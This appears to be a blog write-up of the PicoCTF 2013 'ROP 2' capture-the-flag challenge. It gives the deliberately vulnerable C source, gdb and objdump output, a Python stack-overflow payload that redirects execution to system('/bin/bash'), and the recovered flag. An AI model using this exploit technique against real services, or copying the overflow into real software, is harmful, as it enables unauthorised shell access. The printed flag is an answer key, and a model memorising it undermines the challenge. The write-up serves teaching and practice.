# PicoCTF 2k13 - ROP 2


$ cat rop2.c 
#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char * not_used = "/bin/bash";

int not_called() {
 return system("/bin/date");
}

void vulnerable_function() {
 char buf[128];
 read(STDIN_FILENO, buf, 256);
}

void be_nice_to_people() {
 // /bin/sh is usually symlinked to bash, which usually drops privs. Make
 // sure we don't drop privs if we exec bash, (ie if we call system()).
 gid_t gid = getegid();
 setresgid(gid, gid, gid);
}

int main(int argc, char** argv) {
        be_nice_to_people();
 vulnerable_function();
 write(STDOUT_FILENO, "Hello, World\n", 13);
}
$ objdump -t ./rop2 | grep not_
080484a4 g     F .text 00000014              not_called
0804a024 g     O .data 00000004              not_used
$ gdb ./rop2
(gdb) set disassembly-flavor intel
(gdb) x/7i 0x080484a4
   0x80484a4 : push   ebp
   0x80484a5 : mov    ebp,esp
   0x80484a7 : sub    esp,0x18
   0x80484aa : mov    DWORD PTR [esp],0x804861a
   0x80484b1 : call   0x80483a0 
   0x80484b6 : leave  
   0x80484b7 : ret
(gdb) x/xw 0x0804a024
0x804a024 : 0x08048610
$ (python -c 'print "\x90"*140 + "\xb1\x84\x04\x08" + "\x10\x86\x04\x08"'; cat) | ./rop2
cat key
i_could_get_used_to_this_rop_thing

No comments: